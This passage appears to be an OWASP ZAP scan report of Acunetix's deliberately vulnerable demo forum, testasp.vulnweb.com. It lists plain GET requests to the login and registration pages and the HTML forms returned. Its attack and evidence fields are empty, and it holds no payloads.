style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 399 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3256 |
| Response Body - size: 3,256 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3615 |
| Response Body - size: 3,615 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3613 |
| Response Body - size: 3,613 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 3554 |
| Response Body - size: 3,554 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
